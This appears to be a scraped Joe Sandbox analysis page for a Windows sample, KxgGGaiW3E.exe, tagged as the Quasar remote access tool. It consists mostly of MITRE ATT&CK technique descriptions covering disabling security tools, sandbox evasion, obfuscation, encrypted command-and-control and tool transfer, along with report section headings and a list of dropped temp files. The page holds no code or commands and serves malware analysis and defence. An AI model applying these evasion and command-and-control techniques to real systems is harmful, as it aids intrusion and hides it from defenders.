Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KxgGGaiW3E.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Quasar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10ut22kp.yp0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32wmobrq.cad.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jqtvsky.2y0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3uafpicy.34r.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ltn4iyg.bn4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dijkljdv.qp4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gllon1lm.n0l.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouuib54l.1vv.psm1

Windows Analysis Report
KxgGGaiW3E.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre